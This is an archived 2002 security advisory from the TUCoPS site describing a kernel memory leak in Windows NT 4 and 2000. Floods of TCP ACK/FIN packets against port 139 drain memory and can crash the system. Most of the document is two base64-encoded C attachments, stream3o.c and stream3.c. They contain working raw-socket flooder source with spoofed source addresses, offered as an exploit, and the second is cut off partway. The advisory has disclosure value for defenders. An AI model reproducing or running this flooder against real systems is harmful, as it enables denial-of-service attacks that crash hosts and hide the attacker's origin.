Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: win5040.htm

TCP/IP ACK & FIN packet exhausts kernel memory



29th Jan 2002 [SBWID-5040]
COMMAND

	TCP/IP ACK & FIN packet exhausts kernel memory

SYSTEMS AFFECTED

	 Windows NT 4 all SP\'s ???

	 Windows 2000 SP1

PROBLEM

	Dark Zorro <darkz@pisem.net> && Error  <error@pochtamt.ru>
	in SECURITY.NNOV advisory [http://www.security.nnov.ru/advisories] :
	

	Stream 3 is flood attack of absolutely identical empty TCP packets  with
	ACK and FIN flags. Dark Zoro  and  Error  discovered  unpatched  Windows
	leaks the memory from non-paged kernel  space  during  stream  3  attack
	against NetBIOS (TCP/139) port. This memory never  released  back  after
	attack. Since this attack doesn\'t require TCP connection it may  bypass
	purely configured packet  filters.  Effectivity  of  attack  depends  on
	amount of  RAM  installed  in  target  host,  routing  schema  and  link
	bandwidth between source and target  (xDSL/10BaseT  is  ideal).  Results
	may vary from missing 2-3 Mb of non-paged memory to blue screen.
	

	I\'ve got few  unverified  reports  of  successful  usage  of  stream  3
	against different ports and different systems.
	

	 Exploit :

	 =======

	

	Try stream3.c it should be more faster  and  compatible.  stream3o.c  is
	variant of old stream.c. It compiles and works under i386 FreeBSD.
	

	

	------------A75016D2F7EDAB0

	Content-Type: application/octet-stream; name=\"stream3o.c\"

	Content-Transfer-Encoding: base64

	Content-Disposition: attachment; filename=\"stream3o.c\"

	

	LyoKIHN0cmVhbTMuYyAtIFRDUCBGSU4gcGFja2V0IGZsb29kZXIKIHBhdGNoZWQgZnJvbSBzdHJl

	YW0uYyBieSAzQVBBM0EsIDIwMDAKIDNBUEEzQUBzZWN1cml0eS5ubm92LnJ1CiovCiNpbmNsdWRl

	IDxzdGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1

	ZGUgPHN0cmluZ3MuaD4KI2luY2x1ZGUgPHN5cy90aW1lLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMu

	aD4KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2lmbmRlZiBfX1VTRV9CU0QKI2RlZmluZSBfX1VT

	RV9CU0QKI2VuZGlmCiNpZm5kZWYgX19GQVZPUl9CU0QKI2RlZmluZSBfX0ZBVk9SX0JTRAojZW5k

	aWYKI2luY2x1ZGUgPG5ldGluZXQvaW5fc3lzdG0uaD4KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4K

	I2luY2x1ZGUgPG5ldGluZXQvaXAuaD4KI2luY2x1ZGUgPG5ldGluZXQvdGNwLmg+CiNpbmNsdWRl

	IDxhcnBhL2luZXQuaD4KI2luY2x1ZGUgPG5ldGRiLmg+CgojaWZkZWYgTElOVVgKI2RlZmluZSBG

	SVgoeCkgIGh0b25zKHgpCiNlbHNlCiNkZWZpbmUgRklYKHgpICAoeCkKI2VuZGlmCgpzdHJ1Y3Qg

	aXBfaGRyIHsKICAgIHVfaW50ICAgICAgIGlwX2hsOjQsICAgICAgICAgICAgICAgIC8qIGhlYWRl

	ciBsZW5ndGggaW4gMzIgYml0IHdvcmRzICovCiAgICAgICAgICAgICAgICBpcF92OjQ7ICAgICAg

	ICAgICAgICAgICAvKiBpcCB2ZXJzaW9uICovCiAgICB1X2NoYXIgICAgICBpcF90b3M7ICAgICAg

	ICAgICAgICAgICAvKiB0eXBlIG9mIHNlcnZpY2UgKi8KICAgIHVfc2hvcnQgICAgIGlwX2xlbjsg

	ICAgICAgICAgICAgICAgIC8qIHRvdGFsIHBhY2tldCBsZW5ndGggKi8KICAgIHVfc2hvcnQgICAg

	IGlwX2lkOyAgICAgICAgICAgICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICovCiAgICB1X3Nob3J0

	ICAgICBpcF9vZmY7ICAgICAgICAgICAgICAgICAvKiBmcmFnbWVudCBvZmZzZXQgKi8KICAgIHVf

	Y2hhciAgICAgIGlwX3R0bDsgICAgICAgICAgICAgICAgIC8qIHRpbWUgdG8gbGl2ZSAqLwogICAg

	dV9jaGFyICAgICAgaXBfcDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9jb2wgKi8KICAgIHVf

	c2hvcnQgICAgIGlwX3N1bTsgICAgICAgICAgICAgICAgIC8qIGlwIGNoZWNrc3VtICovCiAgICB1

	X2xvbmcgICAgICBzYWRkciwgZGFkZHI7ICAgICAgICAgICAvKiBzb3VyY2UgYW5kIGRlc3QgYWRk

	cmVzcyAqLwp9OwoKc3RydWN0IHRjcF9oZHIgewogICAgdV9zaG9ydCAgICAgdGhfc3BvcnQ7ICAg

	ICAgICAgICAgICAgLyogc291cmNlIHBvcnQgKi8KICAgIHVfc2hvcnQgICAgIHRoX2Rwb3J0OyAg

	ICAgICAgICAgICAgIC8qIGRlc3RpbmF0aW9uIHBvcnQgKi8KICAgIHVfbG9uZyAgICAgIHRoX3Nl

	cTsgICAgICAgICAgICAgICAgIC8qIHNlcXVlbmNlIG51bWJlciAqLwogICAgdV9sb25nICAgICAg

	dGhfYWNrOyAgICAgICAgICAgICAgICAgLyogYWNrbm93bGVkZ2VtZW50IG51bWJlciAqLwogICAg

	dV9pbnQgICAgICAgdGhfeDI6NCwgICAgICAgICAgICAgICAgLyogdW51c2VkICovCiAgICAgICAg

	ICAgICAgICB0aF9vZmY6NDsgICAgICAgICAgICAgICAvKiBkYXRhIG9mZnNldCAqLwogICAgdV9j

	aGFyICAgICAgdGhfZmxhZ3M7ICAgICAgICAgICAgICAgLyogZmxhZ3MgZmllbGQgKi8KICAgIHVf

	c2hvcnQgICAgIHRoX3dpbjsgICAgICAgICAgICAgICAgIC8qIHdpbmRvdyBzaXplICovCiAgICB1

	X3Nob3J0ICAgICB0aF9zdW07ICAgICAgICAgICAgICAgICAvKiB0Y3AgY2hlY2tzdW0gKi8KICAg

	IHVfc2hvcnQgICAgIHRoX3VycDsgICAgICAgICAgICAgICAgIC8qIHVyZ2VudCBwb2ludGVyICov

	Cn07CgpzdHJ1Y3QgdGNwb3B0X2hkciB7CiAgICB1X2NoYXIgIHR5cGU7ICAgICAgICAgICAgICAg

	ICAgICAgICAvKiB0eXBlICovCiAgICB1X2NoYXIgIGxlbjsgICAgICAgICAgICAgICAgICAgICAg

	ICAgICAgICAgIC8qIGxlbmd0aCAqLwogICAgdV9zaG9ydCB2YWx1ZTsgICAgICAgICAgICAgICAg

	ICAgICAgLyogdmFsdWUgKi8KfTsKCnN0cnVjdCBwc2V1ZG9faGRyIHsgICAgICAgICAgICAgICAg

	ICAgICAvKiBTZWUgUkZDIDc5MyBQc2V1ZG8gSGVhZGVyICovCiAgICB1X2xvbmcgc2FkZHIsIGRh

	ZGRyOyAgICAgICAgICAgICAgICAgICAgICAgIC8qIHNvdXJjZSBhbmQgZGVzdCBhZGRyZXNzICov

	CiAgICB1X2NoYXIgbWJ6LCBwdGNsOyAgICAgICAgICAgICAgICAgICAvKiB6ZXJvIGFuZCBwcm90

	b2NvbCAqLwogICAgdV9zaG9ydCB0Y3BsOyAgICAgICAgICAgICAgICAgICAgICAgLyogdGNwIGxl

	bmd0aCAqLwp9OwoKc3RydWN0IHBhY2tldCB7CiAgICBzdHJ1Y3QgaXAvKl9oZHIqLyBpcDsKICAg

	IHN0cnVjdCB0Y3BoZHIgdGNwOwovKiBzdHJ1Y3QgdGNwb3B0X2hkciBvcHQ7ICovCn07CgpzdHJ1

	Y3QgY2tzdW0gewogICAgc3RydWN0IHBzZXVkb19oZHIgcHNldWRvOwogICAgc3RydWN0IHRjcGhk

	ciB0Y3A7Cn07CgpzdHJ1Y3QgcGFja2V0IHBhY2tldDsKc3RydWN0IGNrc3VtIGNrc3VtOwpzdHJ1

	Y3Qgc29ja2FkZHJfaW4gc19pbjsKdV9zaG9ydCBkc3Rwb3J0LCBwa3RzaXplLCBwcHM7CnVfbG9u

	ZyBkc3RhZGRyOwppbnQgc29jazsKCnZvaWQgdXNhZ2UoY2hhciAqcHJvZ25hbWUpCnsKICAgIGZw

	cmludGYoc3RkZXJyLCAiVXNhZ2U6ICVzIDxkc3RhZGRyPiA8ZHN0cG9ydD4gPHBrdHNpemU+IDxw

	cHM+XG4iLCAKcHJvZ25hbWUpOwogICAgZnByaW50ZihzdGRlcnIsICIgICAgZHN0YWRkciAgLSB0

	aGUgdGFyZ2V0IHdlIGFyZSB0cnlpbmcgdG8gYXR0YWNrLlxuIik7CiAgICBmcHJpbnRmKHN0ZGVy

	ciwgIiAgICBkc3Rwb3J0ICAtIHRoZSBwb3J0IG9mIHRoZSB0YXJnZXQsIDAgPSByYW5kb20uXG4i

	KTsKICAgIGZwcmludGYoc3RkZXJyLCAiICAgIHBrdHNpemUgIC0gdGhlIGV4dHJhIHNpemUgdG8g

	dXNlLiAgMCA9IG5vcm1hbCAKc3luLlxuIik7CiAgICBleGl0KDEpOwp9CgovKiBUaGlzIGlzIGEg

	cmVmZXJlbmNlIGludGVybmV0IGNoZWNrc3VtIGltcGxpbWVudGF0aW9uLCBub3QgdmVyeSBmYXN0

	ICovCmlubGluZSB1X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pCnsKICAg

	IHJlZ2lzdGVyIGludCBubGVmdCA9IGxlbjsKICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRy

	OwogICAgcmVnaXN0ZXIgaW50IHN1bSA9IDA7CiAgICB1X3Nob3J0IGFuc3dlciA9IDA7CgogICAg

	IC8qIE91ciBhbGdvcml0aG0gaXMgc2ltcGxlLCB1c2luZyBhIDMyIGJpdCBhY2N1bXVsYXRvciAo

	c3VtKSwgd2UgYWRkCiAgICAgICogc2VxdWVudGlhbCAxNiBiaXQgd29yZHMgdG8gaXQsIGFuZCBh

	dCB0aGUgZW5kLCBmb2xkIGJhY2sgYWxsIHRoZQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUg

	dG9wIDE2IGJpdHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8KCiAgICAgd2hpbGUgKG5sZWZ0

	ID4gMSkgIHsKICAgICAgICAgc3VtICs9ICp3Kys7CiAgICAgICAgIG5sZWZ0IC09IDI7CiAgICAg

	fQoKICAgICAvKiBtb3AgdXAgYW4gb2RkIGJ5dGUsIGlmIG5lY2Vzc2FyeSAqLwogICAgIGlmIChu

	bGVmdCA9PSAxKSB7CiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2NoYXIgKikg

	dzsKICAgICAgICAgc3VtICs9IGFuc3dlcjsKICAgICB9CgogICAgIC8qIGFkZCBiYWNrIGNhcnJ5

	IG91dHMgZnJvbSB0b3AgMTYgYml0cyB0byBsb3cgMTYgYml0cyAqLwogICAgIHN1bSA9IChzdW0g

	Pj4gMTYpICsgKHN1bSAmIDB4ZmZmZik7IC8qIGFkZCBoaSAxNiB0byBsb3cgMTYgKi8KICAgICBz

	dW0gKz0gKHN1bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJyeSAqLwogICAgIGFu

	c3dlciA9IH5zdW07ICAgICAgICAgICAgICAgICAgICAgLyogdHJ1bmNhdGUgdG8gMTYgYml0cyAq

	LwogICAgIHJldHVybihhbnN3ZXIpOwp9Cgp1X2xvbmcgbG9va3VwKGNoYXIgKmhvc3RuYW1lKQp7

	CiAgICBzdHJ1Y3QgaG9zdGVudCAqaHA7CgogICAgaWYgKChocCA9IGdldGhvc3RieW5hbWUoaG9z

	dG5hbWUpKSA9PSBOVUxMKSB7CiAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkNvdWxkIG5vdCByZXNv

	bHZlICVzLlxuIiwgaG9zdG5hbWUpOwogICAgICAgZXhpdCgxKTsKICAgIH0KCiAgICByZXR1cm4g

	Kih1X2xvbmcgKilocC0+aF9hZGRyOwp9CgoKdm9pZCBmbG9vZGVyKHZvaWQpCnsKICAgIHN0cnVj

	dCB0aW1lc3BlYyB0czsKICAgIGludCBpOwoKCiAgICBtZW1zZXQoJnBhY2tldCwgMCwgc2l6ZW9m

	KHBhY2tldCkpOwoKICAgIHRzLnR2X3NlYyAgICAgICAgICAgICAgICAgICA9IDA7CiAgICB0cy50

	dl9uc2VjICAgICAgICAgICAgICAgICAgPSAxMDsKCiAgICBwYWNrZXQuaXAuaXBfaGwgICAgICAg

	ICAgICAgPSA1OwogICAgcGFja2V0LmlwLmlwX3YgICAgICAgICAgICAgID0gNDsKICAgIHBhY2tl

	dC5pcC5pcF9wICAgICAgICAgICAgICA9IElQUFJPVE9fVENQOwogICAgcGFja2V0LmlwLmlwX3Rv

	cyAgICAgICAgICAgID0gMHgwODsKICAgIHBhY2tldC5pcC5pcF9pZCAgICAgICAgICAgICA9IHJh

	bmQoKTsKICAgIHBhY2tldC5pcC5pcF9sZW4gICAgICAgICAgICA9IEZJWChzaXplb2YocGFja2V0

	KSk7CiAgICBwYWNrZXQuaXAuaXBfb2ZmICAgICAgICAgICAgPSAwOyAvKiBJUF9ERj8gKi8KICAg

	IHBhY2tldC5pcC5pcF90dGwgICAgICAgICAgICA9IDI1NTsKICAgIHBhY2tldC5pcC5pcF9kc3Qu

	c19hZGRyICAgICA9IGRzdGFkZHI7CiAgICBwYWNrZXQuaXAuaXBfc3JjLnNfYWRkciAgICAgPSBy

	YW5kb20oKTsKICAgIHBhY2tldC5pcC5pcF9zdW0gICAgICAgICAJPSAwOwogICAgcGFja2V0LnRj

	cC50aF9zdW0gICAgICAgICAgID0gMDsKCiAgICBwYWNrZXQudGNwLnRoX3dpbiAgICAgICAgICAg

	PSBodG9ucygxNjM4NCk7CiAgICBwYWNrZXQudGNwLnRoX3NlcSAgICAgICAgICAgPSByYW5kb20o

	KTsKICAgIHBhY2tldC50Y3AudGhfYWNrICAgICAgICAgICA9IDA7CiAgICBwYWNrZXQudGNwLnRo

	X29mZiAgICAgICAgICAgPSA1OyAvKiA1ICovCiAgICBwYWNrZXQudGNwLnRoX3VycCAgICAgICAg

	ICAgPSAwOwogICAgcGFja2V0LnRjcC50aF9hY2sgCQk9IHJhbmQoKTsKICAgIHBhY2tldC50Y3Au

	dGhfZmxhZ3MgCT0gVEhfQUNLfFRIX0ZJTjsKICAgIHBhY2tldC50Y3AudGhfc3BvcnQgCT0gcmFu

	ZCgpOwogICAgcGFja2V0LnRjcC50aF9kcG9ydCAgICAgICAgID0gZHN0cG9ydD9odG9ucyhkc3Rw

	b3J0KTpyYW5kKCk7CgovKgogICAgcGFja2V0Lm9wdC50eXBlICAgICAgICAgICAgID0gMHgwMjsK

	ICAgIHBhY2tldC5vcHQubGVuICAgICAgICAgICAgICA9IDB4MDQ7CiAgICBwYWNrZXQub3B0LnZh

	bHVlICAgICAgICAgICAgPSBodG9ucygxNDYwKTsKKi8KCgogICAgc19pbi5zaW5fZmFtaWx5ICAg

	ICAgICAgICAgID0gQUZfSU5FVDsKICAgIHNfaW4uc2luX3BvcnQgICAgICAgICAgICAgICA9IHBh

	Y2tldC50Y3AudGhfZHBvcnQ7CiAgICBzX2luLnNpbl9hZGRyLnNfYWRkcgk9IGRzdGFkZHI7Cgog

	ICAgY2tzdW0ucHNldWRvLmRhZGRyICAgICAgICAgID0gZHN0YWRkcjsKICAgIGNrc3VtLnBzZXVk

	by5zYWRkcgkJPSBwYWNrZXQuaXAuaXBfc3JjLnNfYWRkcjsKICAgIGNrc3VtLnBzZXVkby5tYnog

	ICAgICAgICAgICA9IDA7CiAgICBja3N1bS5wc2V1ZG8ucHRjbCAgICAgICAgICAgPSBJUFBST1RP

	X1RDUDsKICAgIGNrc3VtLnBzZXVkby50Y3BsICAgICAgICAgICA9IGh0b25zKHNpemVvZihzdHJ1

	Y3QgdGNwaGRyKSk7CiAgICBja3N1bS50Y3AgICAgICAgICAgICAgICAgICAgPSBwYWNrZXQudGNw

	OwoKICAgIHBhY2tldC5pcC5pcF9zdW0gICAgICAgICAgICA9IGluX2Nrc3VtKCh2b2lkICopJnBh

	Y2tldC5pcCwgMjApOwogICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgID0gaW5fY2tzdW0o

	KHZvaWQgKikmY2tzdW0sIHNpemVvZihja3N1bSkpOwoKCiAgICBmb3IoaT0wOzsrK2kpIHsKCgog

	ICAgICAgaWYgKHNlbmR0byhzb2NrLCAmcGFja2V0LCBzaXplb2YocGFja2V0KSwgMCwgKHN0cnVj

	dCBzb2NrYWRkciAKKikmc19pbiwgc2l6ZW9mKHNfaW4pKSA8IDApCiAgICAgICAgICBwZXJyb3Io

	Implc3MiKTsKCiAgICB9Cn0KCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pCnsKICAg

	IGludCBvbiA9IDE7CgogICAgcHJpbnRmKCJzdHJlYW0zLmMgdjAuMDEgLSBUQ1AgRklOIFBhY2tl

	dCBGbG9vZGVyXG4gbW9kaWZpZWQgYnkgM0FQQTNBQHNlY3VyaXR5Lm5ub3YucnVcbiIpOwoKICAg

	IGlmICgoc29jayA9IHNvY2tldChQRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19SQVcpKSA8IDAp

	IHsKICAgICAgIHBlcnJvcigic29ja2V0Iik7CiAgICAgICBleGl0KDEpOwogICAgfQoKICAgIHNl

	dGdpZChnZXRnaWQoKSk7IHNldHVpZChnZXR1aWQoKSk7CgogICAgaWYgKGFyZ2MgPCA0KQogICAg

	ICAgdXNhZ2UoYXJndlswXSk7CgogICAgaWYgKHNldHNvY2tvcHQoc29jaywgSVBQUk9UT19JUCwg

	SVBfSERSSU5DTCwgKGNoYXIgKikmb24sIHNpemVvZihvbikpIDwgIDApIHsKICAgICAgIHBlcnJv

	cigic2V0c29ja29wdCIpOwogICAgICAgZXhpdCgxKTsKICAgIH0KCiAgICBzcmFuZCgodGltZShO

	VUxMKSBeIGdldHBpZCgpKSArIGdldHBwaWQoKSk7CgogICAgcHJpbnRmKCJcblJlc29sdmluZyBJ

	UHMuLi4iKTsgZmZsdXNoKHN0ZG91dCk7CgogICAgZHN0YWRkciAgICAgPSBsb29rdXAoYXJndlsx

	XSk7CiAgICBkc3Rwb3J0ICAgICA9IGF0b2koYXJndlsyXSk7CiAgICBwa3RzaXplICAgICA9IGF0

	b2koYXJndlszXSk7CgogICAgcHJpbnRmKCJTZW5kaW5nLi4uIik7IGZmbHVzaChzdGRvdXQpOwoK

	ICAgIGZsb29kZXIoKTsKCiAgICByZXR1cm4gMDsKfQo=

	

	

	

	------------A75016D2F7EDAB0

	Content-Type: application/octet-stream; name=\"stream3.c\"

	Content-Transfer-Encoding: base64

	Content-Disposition: attachment; filename=\"stream3.c\"

	

	LyogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKIHN0cmVhbTMuYyAtIEZJTi9B

	Q0sgZmxvb2RlcgogVGVzdGVkIHRvIGNvbXBpbGUgYW5kIHdvcmsgdW5kZXIgRnJlZUJTRAogKGMp

	IGJ5IDNBUEEzQSBAIFNFQ1VSSVRZLk5OT1YsIDIwMDAKIDNBUEEzQUBzZWN1cml0eS5ubm92LnJ1

	CiBodHRwOi8vd3d3LnNlY3VyaXR5Lm5ub3YucnUKIFRoYW54IHRvIERhcmtab3JybyAmIEVycm9y

	IGZvciBkaXNjb3ZlcmluZyB0aGlzIHByb2JsZW0KIEdyZWV0eiB0byB2b2lkLnJ1LiBHZXQgYmV0

	dGVyLCBEdWtlIQoqLwoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2lu

	Y2x1ZGUgPGN0eXBlLmg+CiNpbmNsdWRlIDxzdHJpbmdzLmg+CiNpbmNsdWRlIDxzeXMvdGltZS5o

	PgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CgoKI2luY2x1

	ZGUgPG5ldGluZXQvaW4uaD4KI2luY2x1ZGUgPG5ldGRiLmg+CgojaWZkZWYgTElOVVgKI2RlZmlu

	ZSBGSVgoeCkgIGh0b25zKHgpCiNlbHNlCiNkZWZpbmUgRklYKHgpICAoeCkKI2VuZGlmCgojZGVm

	aW5lCVRIX0ZJTgkweDAxCiNkZWZpbmUJVEhfU1lOCTB4MDIKI2RlZmluZQlUSF9SU1QJMHgwNAoj

	ZGVmaW5lCVRIX1BVU0gJMHgwOAojZGVmaW5lCVRIX0FDSwkweDEwCiNkZWZpbmUJVEhfVVJHCTB4

	MjAKCgpzdHJ1Y3QgaXBfaGRyIHsKICAgIHVfaW50ICAgICAgIGlwX2hsOjQsICAgICAgICAgICAg

	ICAgIC8qIGhlYWRlciBsZW5ndGggaW4gMzIgYml0IHdvcmRzICovCiAgICAgICAgICAgICAgICBp

	cF92OjQ7ICAgICAgICAgICAgICAgICAvKiBpcCB2ZXJzaW9uICovCiAgICB1X2NoYXIgICAgICBp

	cF90b3M7ICAgICAgICAgICAgICAgICAvKiB0eXBlIG9mIHNlcnZpY2UgKi8KICAgIHVfc2hvcnQg

	ICAgIGlwX2xlbjsgICAgICAgICAgICAgICAgIC8qIHRvdGFsIHBhY2tldCBsZW5ndGggKi8KICAg

	IHVfc2hvcnQgICAgIGlwX2lkOyAgICAgICAgICAgICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICov

	CiAgICB1X3Nob3J0ICAgICBpcF9vZmY7ICAgICAgICAgICAgICAgICAvKiBmcmFnbWVudCBvZmZz

	ZXQgKi8KICAgIHVfY2hhciAgICAgIGlwX3R0bDsgICAgICAgICAgICAgICAgIC8qIHRpbWUgdG8g

	bGl2ZSAqLwogICAgdV9jaGFyICAgICAgaXBfcDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9j

	b2wgKi8KICAgIHVfc2hvcnQgICAgIGlwX3N1bTsgICAgICAgICAgICAgICAgIC8qIGlwIGNoZWNr

	c3VtICovCiAgICB1X2xvbmcgICAgICBpcF9zcmMsIGlwX2RzdDsgICAgICAgICAgIC8qIHNvdXJj

	ZSBhbmQgZGVzdCBhZGRyZXNzICovCn07CgpzdHJ1Y3QgdGNwX2hkciB7CiAgICB1X3Nob3J0ICAg

	ICB0aF9zcG9ydDsgICAgICAgICAgICAgICAvKiBzb3VyY2UgcG9ydCAqLwogICAgdV9zaG9ydCAg

	ICAgdGhfZHBvcnQ7ICAgICAgICAgICAgICAgLyogZGVzdGluYXRpb24gcG9ydCAqLwogICAgdV9s

	b25nICAgICAgdGhfc2VxOyAgICAgICAgICAgICAgICAgLyogc2VxdWVuY2UgbnVtYmVyICovCiAg

	ICB1X2xvbmcgICAgICB0aF9hY2s7ICAgICAgICAgICAgICAgICAvKiBhY2tub3dsZWRnZW1lbnQg

	bnVtYmVyICovCiAgICB1X2ludCAgICAgICB0aF94Mjo0LCAgICAgICAgICAgICAgICAvKiB1bnVz

	ZWQgKi8KICAgICAgICAgICAgICAgIHRoX29mZjo0OyAgICAgICAgICAgICAgIC8qIGRhdGEgb2Zm

	c2V0ICovCiAgICB1X2NoYXIgICAgICB0aF9mbGFnczsgICAgICAgICAgICAgICAvKiBmbGFncyBm

	aWVsZCAqLwogICAgdV9zaG9ydCAgICAgdGhfd2luOyAgICAgICAgICAgICAgICAgLyogd2luZG93

	IHNpemUgKi8KICAgIHVfc2hvcnQgICAgIHRoX3N1bTsgICAgICAgICAgICAgICAgIC8qIHRjcCBj

	aGVja3N1bSAqLwogICAgdV9zaG9ydCAgICAgdGhfdXJwOyAgICAgICAgICAgICAgICAgLyogdXJn

	ZW50IHBvaW50ZXIgKi8KfTsKCgpzdHJ1Y3QgcHNldWRvX2hkciB7ICAgICAgICAgICAgICAgICAg

	ICAgLyogU2VlIFJGQyA3OTMgUHNldWRvIEhlYWRlciAqLwogICAgdV9sb25nIHNhZGRyLCBkYWRk

	cjsgICAgICAgICAgICAgICAgLyogc291cmNlIGFuZCBkZXN0IGFkZHJlc3MgKi8KICAgIHVfY2hh

	ciBtYnosIHB0Y2w7ICAgICAgICAgICAgICAgICAgIC8qIHplcm8gYW5kIHByb3RvY29sICovCiAg

	ICB1X3Nob3J0IHRjcGw7ICAgICAgICAgICAgICAgICAgICAgICAvKiB0Y3AgbGVuZ3RoICovCn07

	CgpzdHJ1Y3QgcGFja2V0IHsKICAgIHN0cnVjdCBpcF9oZHIgaXA7CiAgICBzdHJ1Y3QgdGNwX2hk

	ciB0Y3A7Cn07CgpzdHJ1Y3QgY2tzdW0gewogICAgc3RydWN0IHBzZXVkb19oZHIgcHNldWRvOwog

	ICAgc3RydWN0IHRjcF9oZHIgdGNwOwp9OwoKCgp1X3Nob3J0IGRzdHBvcnQ9MTM5LCBzcmNwb3J0

	PTA7CnVfbG9uZyBkc3RhZGRyLCBzcmNhZGRyPTA7CmludCBzb2NrOwoKdm9pZCB1c2FnZShjaGFy

	ICpwcm9nbmFtZSkKewogICAgZnByaW50ZihzdGRlcnIsIAogICAgICJVc2FnZTogJXMgPGRzdGFk

	ZHI+IDxkc3Rwb3J0PiA8c3JjYWRkcj4gPHNyY3BvcnQ+XG4iCiAgICAgIiAgICBkc3RhZGRyICAg

	ICAtIHRoZSB0YXJnZXQgd2UgYXJlIHRyeWluZyB0byBhdHRhY2suXG4iCiAgICAgIiAgICBkc3Rw

	b3J0ICAgICAtIFRDUCBwb3J0ICgxMzkgZGVmYXVsdCkuXG4iCiAgICAgIiAgICBzcmNhZGRyICAg

	ICAtIHNwb29mZWQgc291cmNlIGFkZHJlc3MgKHJhbmRvbSBkZWZhdWx0KVxuIgogICAgICIgICAg

	c3JjcG9ydCAgICAgLSBzcG9vZmVkIHNvdXJjZSBUQ1AgcG9ydCAocmFuZG9tIGRlZmF1bHQpXG4i

	LAogICAgcHJvZ25hbWUpOwogICAgZXhpdCgxKTsKfQoKCgovKiBUaGlzIGlzIGEgcmVmZXJlbmNl

	IGludGVybmV0IGNoZWNrc3VtIGltcGxpbWVudGF0aW9uLCBub3QgdmVyeSBmYXN0ICovCmlubGlu

	ZSB1X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pCnsKICAgIHJlZ2lzdGVy

	IGludCBubGVmdCA9IGxlbjsKICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRyOwogICAgcmVn

	aXN0ZXIgaW50IHN1bSA9IDA7CiAgICB1X3Nob3J0IGFuc3dlciA9IDA7CgogICAgIC8qIE91ciBh

	bGdvcml0aG0gaXMgc2ltcGxlLCB1c2luZyBhIDMyIGJpdCBhY2N1bXVsYXRvciAoc3VtKSwgd2Ug

	YWRkCiAgICAgICogc2VxdWVudGlhbCAxNiBiaXQgd29yZHMgdG8gaXQsIGFuZCBhdCB0aGUgZW5k

	LCBmb2xkIGJhY2sgYWxsIHRoZQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUgdG9wIDE2IGJp

	dHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8KCiAgICAgd2hpbGUgKG5sZWZ0ID4gMSkgIHsK

	ICAgICAgICAgc3VtICs9ICp3Kys7CiAgICAgICAgIG5sZWZ0IC09IDI7CiAgICAgfQoKICAgICAv

	KiBtb3AgdXAgYW4gb2RkIGJ5dGUsIGlmIG5lY2Vzc2FyeSAqLwogICAgIGlmIChubGVmdCA9PSAx

	KSB7CiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2NoYXIgKikgdzsKICAgICAg

	ICAgc3VtICs9IGFuc3dlcjsKICAgICB9CgogICAgIC8qIGFkZCBiYWNrIGNhcnJ5IG91dHMgZnJv

	bSB0b3AgMTYgYml0cyB0byBsb3cgMTYgYml0cyAqLwogICAgIHN1bSA9IChzdW0gPj4gMTYpICsg

	KHN1bSAmIDB4ZmZmZik7IC8qIGFkZCBoaSAxNiB0byBsb3cgMTYgKi8KICAgICBzdW0gKz0gKHN1

	bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJyeSAqLwogICAgIGFuc3dlciA9IH5z

	dW07ICAgICAgICAgICAgICAgICAgICAgLyogdHJ1bmNhdGUgdG8gMTYgYml0cyAqLwogICAgIHJl

	dHVybihhbnN3ZXIpOwp9Cgp1X2xvbmcgbG9va3VwKGNoYXIgKmhvc3RuYW1lKQp7CiAgICBzdHJ1

	Y3QgaG9zdGVudCAqaHA7CgogICAgaWYgKChocCA9IGdldGhvc3RieW5hbWUoaG9zdG5hbWUpKSA9

	PSBOVUxMKSB7CiAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkNvdWxkIG5vdCByZXNvbHZlICVzLlxu

	IiwgaG9zdG5hbWUpOwogICAgICAgZXhpdCgtMyk7CiAgICB9CgogICAgcmV0dXJuICoodV9sb25n

	ICopaHAtPmhfYWRkcjsKfQoKCnZvaWQgZmxvb2Rlcih2b2lkKQp7CiAgICBpbnQgaTsKICAgIHN0

	cnVjdCBwYWNrZXQgcGFja2V0OwoJCQkJCS8qIHVzZSBzYW1lIHN0cnVjdHVyZSBhcyBwc2V1ZG8g

	cGFja2V0ICovCiAgICBzdHJ1Y3QgY2tzdW0gICogY2tzdW0gPSAoc3RydWN0IGNrc3VtICopKChj

	aGFyICopJnBhY2tldCArIHNpemVvZihzdHJ1Y3QgaXBfaGRyKSAtIHNpemVvZihzdHJ1Y3QgcHNl

	dWRvX2hkcikpIDsKICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBzX2luOwogICAgCiAgICBtZW1zZXQo

	JnBhY2tldCwgMCwgc2l6ZW9mKHBhY2tldCkpOwogICAgCiAgICBpZighc3JjYWRkcilzcmNhZGRy

